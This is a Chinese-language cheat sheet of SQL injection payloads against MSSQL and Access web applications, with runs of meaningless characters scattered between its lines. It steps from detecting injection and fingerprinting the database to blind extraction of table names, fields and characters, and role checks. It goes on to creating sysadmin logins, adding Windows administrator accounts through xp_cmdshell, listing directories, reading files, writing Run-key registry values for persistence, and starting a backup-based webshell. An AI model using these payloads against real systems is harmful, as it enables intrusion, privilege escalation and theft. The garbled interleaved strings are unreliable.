1.判断是否有注入：;and 1=1 与 ;and 1=2（适用于直接拼接到原查询后的数字型参数）。前者页面正常、后者页面异常或为空，说明参数进入了 SQL 拼接；两者都正常或都异常则不能下结论（可能被过滤，或错误被统一处理）。
2.初步判断是否是mssql：;and user>0 。user 返回 nvarchar 类型，与整数比较会触发类型转换错误，错误信息中会直接回显当前数据库用户名（仅在页面回显数据库错误时有效）；Access 没有 user 函数，会报不同的错误。
Zi$a6
3.注入参数是字符型：'and [查询条件] and ''=' 。开头的单引号闭合原查询中的字符串，末尾的 ''=' 与原查询自带的结尾引号拼成 ''='' ，保证拼接后的语句仍然合法。
;M8N%
4.搜索时没过滤参数的：'and [查询条件] and '%25'=' 。%25 是 URL 编码的 % ，服务端解码后为 '%'= ，用于闭合 like '%...%' 形式的模糊查询，使拼接后的语句仍然合法。
W5$jIQ}Bw
5.判断数据库系统 Z4}Yw{=f
$J[h(>-X
;and (select count(*) from sysobjects)>0  mssql（sysobjects 在 SQL Server 2005 及以后是兼容视图，新版本也可用 sys.objects 验证）
1>bkVA
;and (select count(*) from msysobjects)>0  access（Access 默认不允许读取 msysobjects，通常返回"没有读取权限"之类的错误而不是正常页面，出现该错误同样说明后端是 Access）
)8ctNpQt
9/D+6hJ]:
go6Hb>
6.猜表名 ;and (select Count(*) from [表名])>0 （此处猜的是表而不是数据库；表存在则页面正常，不存在则语句报错、页面异常）
,nMLua\
7.猜字段 ;and (select Count(字段名) from 表名)>0 （字段不存在则语句报错，页面异常）
Qz{:m
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0 （把 0 换成具体数值做二分比较即可确定长度；top 1 没有 order by，取到哪条记录不确定，后续各步必须保证取的是同一条记录）
ex $d~
9.(1)猜字段的ascii值(access) h(d<':|
zdyS"H}
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0 （Access 语法；mid 的第 2 个参数是起始位置，逐位推进；与 0 比较改成与具体 ASCII 值做二分比较）
^qiTO`lg
(2)猜字段的ascii值(mssql) LB? evewu
J\_tigd
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0 （MSSQL 语法；unicode() 对 nvarchar 列也能正确取值，ascii() 只适用于单字节字符）
vb9G_Pfz
10.测试权限结构(mssql)：IS_SRVROLEMEMBER / IS_MEMBER 返回 1 表示当前登录属于该角色，0 表示不属于，NULL 表示角色名或登录无效；下面各句页面正常即说明拥有对应权限。
; z :}OD
h_?D%b~5
h\C
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- |=l;UqB
-DX|[70
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >T.U\,om7
e.\d7_T+
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Hh$D:ZO
$"J+3mO
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fcr\XCG7U
{qx}f^WV
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- +q)
^pCC
r4Pm
i
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 3?Bq((
cliP+#
;and 1=(select IS_MEMBER('db_owner'));-- （db_owner 是数据库角色，此判断只针对当前连接所在的数据库）
j?/T7a^
W)<us?5Ec5
*M/3 1qI
11.添加mssql和系统的帐户（以下全部需要 sysadmin 权限；xp_cmdshell 自 SQL Server 2005 起默认禁用，需先 sp_configure 'xp_cmdshell',1 并 reconfigure 开启；操作系统账户能否添加成功取决于 SQL Server 服务账户自身的权限）
!?
GpN tvo~
;exec master.dbo.sp_addlogin username;-- （sp_addlogin 的第 2 个参数可直接指定密码：sp_addlogin username,password）
;exec master.dbo.sp_password null,password,username;-- （参数顺序是 旧密码,新密码,登录名；原文把登录名和密码写反了。新版本应使用 ALTER LOGIN username WITH PASSWORD='password'）
65=i`!f
;exec master.dbo.sp_addsrvrolemember username,sysadmin;-- （参数顺序是 登录名,角色名；原文写反了。新版本应使用 ALTER SERVER ROLE sysadmin ADD MEMBER username）
&Dqg<U
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';-- （net user 的各个开关之间必须用空格分隔，原文缺少空格会导致命令解析失败）
/JtKn*?}:>
;exec master.dbo.xp_cmdshell 'net user username password /add';-- \W(C=e
hn)mNb!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- （只有 SQL Server 服务账户本身具有管理员权限时才会成功）
Pf]6'?kQ
3VB{Qj
$eX ;
2
12.(1)遍历目录 0#G&8*FMN
m-5Dbx!j
;create table dirs(paths varchar(100), id int) （xp_dirtree 返回 subdirectory、depth 两列，与这里的两列一一对应；测试结束后应 drop table dirs 清理痕迹）
E>KV1P
;insert dirs exec master.dbo.xp_dirtree 'c:\' IBQmm(+v
Ts|&_|
;and (select top 1 paths from dirs)>0 （varchar 与 int 比较触发类型转换错误，错误信息中回显目录名；依赖页面回显数据库错误）
Xko[Z;4v8'
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0 （原文末尾的 ">)" 是笔误，应为 ">0"；每次把已得到的目录名追加到 not in 列表中逐个取出）
(3%NudkwT
NL0X =i
"npj%O<bd
(2)遍历目录 )<1M'2
]5YG*sD4
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- （四列对应 xp_availablemedia 的四列输出；下面各条 insert 按各存储过程的输出列数只填前几列；用完后应 drop table temp）
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 qdL;Ii<Y0
}Wn6r_:
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 hR[Qdu6r
Q^DKKp
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 %S]5wR6;_
f<!eJO:<'
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（需要 xp_cmdshell 已开启；每行输出占一条记录）
z4&|~-m,
1
BAnf9
y2TJDb1
13.mssql中的存储过程（xp_reg* 默认只有 sysadmin 可执行；xp_regwrite 以 SQL Server 服务账户的权限写 HKLM，写入 Run 键即相当于留下开机持久化，测试时慎用并记得清理）
9%$4Ux*q
xp_regenumvalues 注册表根键, 子键 X[(u]h`
<S6|$7{1
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (YGJw?]
|TkMrj0
xp_regread 根键,子键,键值名 FlrLXTx0
Yr,e7da
;exec xp_regread g&\A1H
Z[FSy-;"
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 kZ[E493bV
v5; c}n
xp_regwrite 根键,子键, 值名, 值类型, 值 |bO}|X
[q?{e1
值类型常用的有 2 种：REG_SZ 表示字符串，REG_DWORD 表示整数（xp_regwrite 还支持 REG_BINARY、REG_MULTI_SZ 等其他类型）
0V}%'Ec<e
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 [L{q
B7fURL
Rqr
xp_regdeletevalue 根键,子键,值名 Z<0M_q9?MO
R8W{[@
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
|jU/R
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
C^2Tql
\.POb5]p0
aHXd1\6m
14.mssql的backup创建webshell（需要 BACKUP DATABASE 权限：sysadmin、db_owner 或 db_backupoperator，且 SQL Server 服务账户对目标 web 目录有写权限）
2Rc#{A
use model Oq|RMl
H .JA)*b-
create table cmd(str image); ,&G